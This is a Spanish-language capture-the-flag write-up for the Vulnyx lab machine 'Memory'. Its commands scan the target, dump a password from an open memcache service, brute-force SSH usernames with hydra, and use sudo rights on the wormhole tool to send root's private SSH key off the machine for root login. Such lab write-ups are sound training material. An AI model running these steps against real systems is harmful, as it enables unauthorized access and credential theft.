Write-up: Máquina Memory (Vulnyx)

Comenzamos con averiguar la dirección IP de la Máquina Victima, para ello primeramente utilizaremos la herramienta netdiscover, para ello ejecutamos el siguiente comando:

$ netdiscover -i eth1 -r 10.0.2.0/24

  • Kali (Máquina Atacante): 10.0.2.4
  • Máquina Victima: 10.0.2.67
Comprobamos si tenemos conexión con la Máquina Victima, para ello ejecutamos el siguiente comando:

$ ping -c 1 10.0.2.67


Como se puede comprobar por el TTL nos enfrentamos a una Máquina Linux.

A continuación, realizamos con la herramienta nmap un reconocimiento de los servicios, para ello ejecutamos el siguiente comando:

$ nmap -Pn -p- 10.0.2.67 -sVC


Como podemos comprobar la Máquina Victima tiene abiertos los puertos 2280 y 11211.

Comprobamos que es lo que corre por el puerto 80.


Si realizamos con la herramienta gobuster un fuzzing web, no encontramos nada.

A continuación, enumeramos el puerto 11211 (memcache), para ello ejecutamos el siguiente comando:

$ nc -vn -w 1 10.0.2.67 11211


Obtenemos los items, para ello ejecutamos el siguiente comando:

stats items


Obtenemos los nombres de claves, para ello ejecutamos el siguiente comando:

stats cachedump 1 0


Obtenemos la información guardada, para ello ejecutamos el siguiente comando:

get password 0 15


Obtenemos la contraseña NewPassword2025 pero desconozcemos el nombre de usuario.

A continuación, con la ayuda de la herramienta hydra realizamos un ataque a ssh para comprobar si a partir de una lista de usuarios junto con la contraseña obtenida es válido para conectarnos a la Máquina Víctima via ssh, para ello ejecutamos el siguiente comando:

$ hydra -L /usr/share/seclists/Usernames/Names/names.txt -p NewPassword2025 ssh://10.0.2.67 -T 64


Obtenemos el usuario alan.

Nos conectamos por ssh, para ello ejecutamos el siguiente comando:

$ ssh alan@10.0.2.67


Introducimos la contraseña obtenida anteriormente.

¡¡¡Somos alan!!!

Enumeramos lo permisos sudo, para ello ejecutamos el siguiente comando:

$ sudo -l


Nos encontramos con el binario wormhole que lo podemos ejecutar como el usuario root, revisamos la ayuda de este binario, para ello ejecutamos el siguiente comando:

$ wormhole help


Vemos que nos permite transferir archivos a traves de los parametros send y receive.

Intentamos transferirnos la clave privada id_rsa del usuario root, para ello ejecutamos los siguientes comandos:

$ sudo -u root /usr/bin/wormhole send /root/.ssh/id_rsa
$ wormhole receive



Utilizamos el fichero id_rsa para conectarnos via ssh a la Máquina victima, para ello ejecutamos los siguientes comandos:

$ chmod 600 id_rsa
$ ssh -i id_rsa root@10.0.2.67


¡¡¡Ya somos root!!!

Ya podemos leer las flags de user root.